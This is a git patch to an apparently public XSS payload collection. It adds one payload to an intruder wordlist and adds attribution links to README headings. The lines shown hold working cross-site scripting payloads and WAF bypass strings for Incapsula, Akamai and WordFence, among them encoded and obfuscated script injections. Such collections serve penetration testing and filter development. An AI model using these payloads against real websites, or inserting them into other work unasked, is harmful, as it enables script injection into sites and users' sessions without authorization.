From ddfdc51e6872582f7684fe7eef4a7008330553df Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Fri, 9 Nov 2018 12:43:30 +0100
Subject: [PATCH] Credit fix - WAF bypass

---
 XSS injection/Intruders/xss_alert.txt | 1 +
 XSS injection/README.md               | 8 ++++----
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/XSS injection/Intruders/xss_alert.txt b/XSS injection/Intruders/xss_alert.txt
index 5a78ca79..4fdbaff9 100644
--- a/XSS injection/Intruders/xss_alert.txt	
+++ b/XSS injection/Intruders/xss_alert.txt	
@@ -512,6 +512,7 @@ perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
 <IMG SRC='vbscript:msgbox("XSS")'>
 <IMG SRC="livescript:[code]">
 <BODY ONLOAD=alert('XSS')>
+xss"><!--><svg/onload=alert(document.domain)>
 <BGSOUND SRC="javascript:alert('XSS');">
 <BR SIZE="&{alert('XSS')}">
 <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 96502030..796cdf0f 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -769,7 +769,7 @@ Works for CSP like `script-src self`
 
 Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
 
-### Incapsula WAF Bypass - 8th march
+### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march
 
 ```javascript
 anythinglr00</script><script>alert(document.domain)</script>uxldz
@@ -777,13 +777,13 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
 anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
 ```
 
-### Incapsula WAF Bypass - 11th september
+### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september
 
 ```javascript
 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
 ```
 
-### Akamai WAF Bypass by @zseano - 18th june
+### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june
 
 ```javascript
 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
@@ -795,7 +795,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
 ```
 
-### WordFence WAF Bypass by @brutelogic - 12th september
+### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september
 
 ```javascript
 <a href=javas&#99;ript:alert(1)>